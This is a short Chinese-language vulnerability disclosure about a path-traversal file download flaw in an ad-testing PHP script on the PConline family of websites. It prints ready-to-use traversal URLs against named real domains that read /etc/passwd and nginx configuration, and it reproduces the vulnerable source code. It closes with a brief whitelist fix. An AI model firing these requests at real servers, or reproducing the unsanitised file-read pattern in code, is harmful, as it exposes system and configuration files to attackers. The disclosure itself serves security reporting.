太平洋网络网站群主站任意文件下载
pconline、pclady、pcauto、pcgames\...均中招都知道太平洋网用的jsp,这个漏洞却发生在php
目测跟广告监控有关
地址:
http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd
我们看看这adtest.php做了神马事情。。。。
http://www.pconline.com.cn/adtest.php?url=adtest.php
<?
$uri = $_GET['url'];
$from = $_GET['from'];
$to = $_GET['to'];
$file = $HTTP_SERVER_VARS["DOCUMENT_ROOT"] . $uri;
$js = $_GET['js'];
if (file_exists($file)) {
$fd = fopen ($file, "r");
$contents = fread ($fd, filesize ($file));
fclose ($fd);
if(isset($to)){
$contents = ereg_replace("#?(src=[^>]+|showIvyViaJs0?\\(['\"])$from([^-.\\w])", "\\1$to\\2", $contents);
}else{
if(isset($js)){
$contents = ereg_replace("<script[^>]*id=[^>]*".$from."[^>]*>.*</script>|<script[^>]*>[^<]*".$from."[^<]*</script>", "<script src=".$js."></script>", $contents);
}
}
print $contents;
}else{
print "errors! Page note found!";
}
?>
http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd
http://www.pcgames.com.cn/adtest.php?url=/../../../etc/passwd
http://www.pconline.com.cn/adtest.php?url=/../../../../usr/local/nginx/conf/nginx.conf
....
修复方案:
adtest.php搞个白名单之类的,最起码不能跨目录啊